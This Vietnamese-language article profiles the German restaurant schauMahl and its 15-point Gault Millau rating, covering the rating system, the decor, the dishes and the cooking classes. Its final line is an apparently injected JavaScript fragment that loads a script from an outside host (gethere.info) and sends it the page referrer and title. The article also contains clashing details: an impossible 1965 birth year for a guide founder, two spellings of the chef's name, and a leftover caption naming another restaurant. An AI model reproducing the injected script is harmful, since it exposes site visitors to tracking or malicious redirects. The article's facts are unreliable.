15 điểm Gault Millau dành cho nhà hàng schauMahl tại Đức

Gault Millau là một tiêu chuẩn đánh giá nhà hàng Pháp nhưng có tầm ảnh hưởng nhất nhì thế giới. Nó được thành lập bởi 2 nhà phê bình nhà hàng, Henri Gault (1929-2000) và Christian Millau (sinh năm 1965).

schauMahl (3)

Gault Millau chạy từ thang điểm 1 đến 20. Những nhà hàng dưới 10 điểm sẽ không bao giờ được liệt kê. Các điểm được trao dựa trên chất lượng thực phẩm, ý kiến của khách hàng về chất lượng dịch vụ, giá cả và không khí của nhà hàng trong những dịp đặc biệt hoặc trong những không gian riêng biệt.

Theo như Christian Millau, Gault Millau không bao giờ được trao đến 20 điểm cho bất kỳ nhà hàng nào bởi ông lập luận rằng sự hoàn hảo là không thể thực hiện. Tuy nhiên, vào năm 2004, 2 nhà hàng của bếp trưởng Marc Veyrat là Maison de Marc Veyrat và L’Auberge de l’Eridan đã nhận được điểm số này. Đối với một số người, điều này phản ánh sự sụt giảm trong tiêu chuẩn đánh giá của Gault Millau.

Hiện đã có một cuộc thảo luận giữa Michelin Guide và Gault Millau. Michelin đương nhiên phổ biến và có tầm ảnh hưởng rộng hơn. Nó đánh giá bao quát hơn về tất cả khía cạnh của nhà hàng, trong khi Gault Millau được coi như một tiêu chuẩn chính thống, chủ yếu dựa theo chất lượng thực phẩm. Gault Millau cũng có hướng dẫn cho các nước khác nhau như Thụy Sỹ, Đức và Áo.

schauMahl tại Offenbach là một trong những nhà hàng tốt nhất ở khu vực. Christoph Kublenz là bếp trưởng của nhà hàng này. Ông đã từ bỏ sự nghiệp ở Na Uy của mình để dốc toàn bộ tâm sức vào schauMahl.

schauMahl (1)

schauMahl nằm trong một tòa nhà Art Nouveau đã được cải tạo lại từ một xưởng chuyên nội thất, không gian bên trong nhà hàng schauMahl khá ấm cúng với gam màu trầm – khác hẳn với phong cách tại những nhà hàng sang trọng ở Đức. Tuy nhiên, vào ban đêm, schauMahl lại mang trong mình nét hiện đại với ảnh sáng đỏ, trắng, những bức tường gạch hay nội thất hướng nội.

schauMahl (2)

schauMahl (7)

schauMahl nổi tiếng với những món ăn nướng đặc biệt là gà nướng sốt kem bạc hà. Món ăn này từng nằm trong Top 20 món ăn ngon nhất nước Đức năm 2013.

Nhà hàng này nổi tiếng với thực đơn rượu dài nhất Đức gồm hơn 100 loại, chủ yếu là những loại rượu vang Đức, Tây Ban Nha và Na Uy. Ngay từ những ngày đầu, ông chủ của nó, Pit Punda đã hướng cho nhà hàng đi theo phong cách cổ điển của những hàng hàng tại Frankfurt – quê hương ông.

schauMahl (6)

schauMahl (5)

Đầu bếp Björn Andreas – người có hơn 20 năm kinh nghiệm làm việc tại nhiều nhà hàng, khách sạn nổi tiếng Châu Âu, hiện đang dẫn đầu nhóm nghiên cứu và phát triển thực đơn cho schauMahl chia sẻ: “Tôi và những cộng sự của mình biết trách nhiệm lớn lao thế nào khi chúng tôi nhận được 15 điểm từ Gault Millau. Có thể đối với những nhà hàng khác trên thế giới, Gault Millau thực sự không có gì quá đặc biệt nhưng chúng tôi đang ở Đức và điều đó hoàn toàn khác biệt”. “Nhiệm vụ của tôi là mỗi tuần phải đưa ra một thực đơn mới cho nhà hàng, nó có thể không phải sáng tạo hoàn toàn những món ăn lạ nhưng tôi sẽ biến tấu những thực đơn có sẵn để “đánh lừa” vị giác của khách hàng. schauMahl luôn giỏi theo những cách đó”.

VOR ZWEITVERWERTUNG UNBEDINGT RUECKSPRACHE -> Gastrokolumne: Biancalani Cucina, Küchenchef Christoph Kubenz und  Geschäftsführer Tom Bock ----> Aufgenommen am 10. September 2013, Walther-von-Cronberg-Platz 7, Frankfurt am Main, Sachsenhausen, von

schauMahl cũng có những lớp học dạy nấu ăn định kỳ cho những đầu bếp không chuyên.Và để thực sự hoàn thiện một thực đơn có sẵn, bạn sẽ phải trải qua 5 khóa học kéo dài 3 tháng với giá 66 euro hoặc 120 euro cho 9 lớp học riêng biệt.

Một bữa ăn tại schauMahl có giá tương đương với 5 khóa học với những món ăn đơn giản nhất, không bao gồm thực đơn đặc biệt và không bao gồm đồ uống.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;